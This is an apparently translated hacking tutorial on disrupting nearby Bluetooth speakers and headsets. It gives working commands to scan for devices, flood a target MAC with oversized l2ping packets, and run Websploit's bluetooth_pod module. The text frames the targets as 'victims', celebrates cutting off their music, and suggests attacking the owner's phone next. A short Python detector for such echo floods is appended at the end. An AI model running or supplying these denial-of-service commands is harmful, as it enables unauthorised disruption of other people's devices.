While modern Wi-Fi routers are capable of filtering out unwanted packets, most Bluetooth adapters are, to say the least, blunt. By and large, they do not care what kind of packet arrives, how large it is, or how many of them you send. Therefore, it is easy to increase the size of the ping packet in Linux to a huge value and then send, say, 1000 of these packets to a Bluetooth device.
Now, in order. First we need to find the right devices in range. To do this, use the command:
$ hcitool scan
As a result of this simple manipulation, you will get a list of available Bluetooth devices with their MAC addresses. If your system does not see the Bluetooth adapter, I recommend installing one of the Bluetooth managers for Linux. In Kali, gnome-bluetooth worked for me personally; it can be installed with the following command:
$ apt-get install gnome-bluetooth
You can also use the Blueman utility:
$ apt-get install blueman
Having received a list of potential victims, you can deal with their Bluetooth devices in several ways. Let’s consider each separately.
The first way: l2ping
We use the following command:
$ l2ping -i hci0 -s <packet value> -f <MAC_address>
It will generate packets of the size you specify in the <packet value> parameter and send them to the MAC address given in the <MAC_address> parameter. In the end, you will see this picture: in the terminal, the response time will gradually increase, and on the attacked device, most likely, Bluetooth will simply turn off. After some time it will turn on again anyway, but the music will be interrupted, and some satisfaction will be received.
The second way: Websploit
There is a more elegant and convenient way to drown out the speaker, from which come the cheerful sounds of rap.
We launch the Websploit utility:
We type the following command in the console:
$ show modules
It will show us all the modules that work with this utility. There are many components that work with Wi-Fi, but we are specifically interested in the bluetooth/bluetooth_pod module:
$ use bluetooth/bluetooth_pod
Now you need to configure all the parameters and provide information about the attacked device:
$ show options
$ set bdaddr <MAC_address>
To knock out Bluetooth reliably, we will change the size of the packets sent:
$ set size 999
All preparatory actions are completed, and we can launch our “killing machine”:
In the output, we will see a very similar picture: pings become longer and the music is interrupted. Beauty! These two methods will work with almost any Bluetooth speakers, headsets, and other similar devices.
The reality of “Bluetooth hacking”
These methods work simply because manufacturers do not release new firmware for these devices that would be able to filter incoming packets. So if you have a laptop with Linux on board, you can definitely call yourself the terror of portable speakers. If the speaker withstands the attack, you can try sending packets to the phone to which it is connected.
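Seen from the receiving side, both methods above produce the same traffic: a burst of oversized L2CAP Echo Requests from a single address. The sketch below is an added example, not part of the original article; it flags that pattern in a capture. The record layout, thresholds and addresses are constructed assumptions, not the output format of any real tool.

```python
from collections import defaultdict, deque
from typing import NamedTuple

L2CAP_ECHO_REQUEST = 0x08  # L2CAP signalling code for Echo Request (what l2ping sends)

class Frame(NamedTuple):
    ts: float     # seconds since capture start
    src: str      # sender BD_ADDR
    code: int     # L2CAP signalling command code
    length: int   # echo payload length in bytes

def detect_echo_flood(frames, window=1.0, max_requests=20, max_payload=128):
    """Return {src: [reasons]} for senders whose echo traffic looks like a flood.

    window, max_requests and max_payload are illustrative assumptions;
    tune them to the environment being monitored.
    """
    recent = defaultdict(deque)  # src -> request timestamps inside the window
    alerts = defaultdict(set)
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.code != L2CAP_ECHO_REQUEST:
            continue  # other signalling traffic is out of scope here
        if f.length > max_payload:
            alerts[f.src].add("oversized")
        q = recent[f.src]
        q.append(f.ts)
        while q and f.ts - q[0] > window:
            q.popleft()  # drop requests that fell out of the sliding window
        if len(q) > max_requests:
            alerts[f.src].add("rate")
    return {src: sorted(reasons) for src, reasons in alerts.items()}

def sample_capture():
    """Constructed sample: one normal peer, one flooding peer, one unrelated frame."""
    frames = []
    # Normal peer: five small echo requests, one per second
    frames += [Frame(float(i), "AA:BB:CC:00:00:01", 0x08, 44) for i in range(5)]
    # Flooding peer: 200 requests in 2 s with 999-byte payloads (the size set above)
    frames += [Frame(i * 0.01, "AA:BB:CC:00:00:02", 0x08, 999) for i in range(200)]
    # Connection Request (0x02) from a third peer must be ignored
    frames.append(Frame(0.5, "AA:BB:CC:00:00:03", 0x02, 700))
    return frames

if __name__ == "__main__":
    for src, reasons in detect_echo_flood(sample_capture()).items():
        print(src, reasons)
```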